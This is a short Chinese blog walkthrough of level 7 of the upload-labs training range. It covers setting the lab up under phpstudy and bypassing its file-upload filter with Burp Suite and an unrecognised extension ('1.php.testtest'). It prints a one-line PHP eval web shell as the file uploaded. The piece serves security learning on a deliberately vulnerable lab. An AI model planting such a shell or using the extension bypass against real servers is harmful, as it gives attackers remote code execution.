upload-labs靶场未知后缀名解析漏洞

煜磊2023-09-26 12:13

upload-labs靶场未知后缀名解析漏洞

版本影响:

phpstudy 版本:5.2.17

1 环境搭建

1.1 在线靶场下载,解压到phpstudy的www目录下,即可使用
复制代码 
https://github.com/c0ny1/upload-labs
1.2 已启动:访问端口9000,端口自设,打开页面选择第七关
复制代码 
http://192.168.225.194:9000/upload_labs/

2 漏洞复现

2.1 上传1.php文件,文件内容如下,显示上传错误,使用bp上传
复制代码 
<?php @eval($_REQUEST[777]);phpinfo();?>
2.2 使用bp转发

修改php后缀和文件内容类型,进行转发,返回信息提示上传成功

访问不能执行

结论php可以上传,php的不能上传,做了黑白名单策略,验证使用白名单或者是黑名单,随便给个后缀testtest

上传1.php.testtest成功

相关推荐
APItesterCris3 分钟前
TypeScript 与淘宝 API:构建类型安全的商品数据查询前端 / Node.js 服务
开发语言·php
WordPress学习笔记1 小时前
wp-config.php文件是什么
php·wp-config
非凡的世界1 小时前
深入理解 PHP 框架里的设计模式
开发语言·设计模式·php
notillusion2 小时前
URR#69598
java·php·程序优化
notillusion2 小时前
CUK#22162
java·php·程序优化
张晓~183399481213 小时前
碰一碰发视频 系统源码 /PHP 语言开发方案
开发语言·线性代数·矩阵·aigc·php·音视频·文心一言
qq_252924194 小时前
PHP 8.0+ 现代Web开发实战指南 引
android·前端·php
Bruce_Liuxiaowei4 小时前
Win7虚拟机加入域错误排查指南:解决无法启动服务问题
运维·网络·windows·安全·网络安全
普通网友5 小时前
KUD#73019
java·php·程序优化
JaguarJack5 小时前
PHP 桌面端框架NativePHP for Desktop v2 发布!
后端·php·laravel
热门推荐
01BongoCat - 跨平台键盘猫动画工具02GitHub 镜像站点03UV安装并设置国内源04两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答05Linux下V2Ray安装配置指南06KGG转MP3工具|非KGM文件|解密音频07GitLab 零基础入门指南:从安装到项目管理全流程08荣耀手机2025年10月发布的新品Magic8比起Magic7,在硬件、性能、价格等上有什么区别,有什么优势09windows找不到gpedit.msc(本地组策略编辑器)102025软件测试面试八股文(含答案+文档)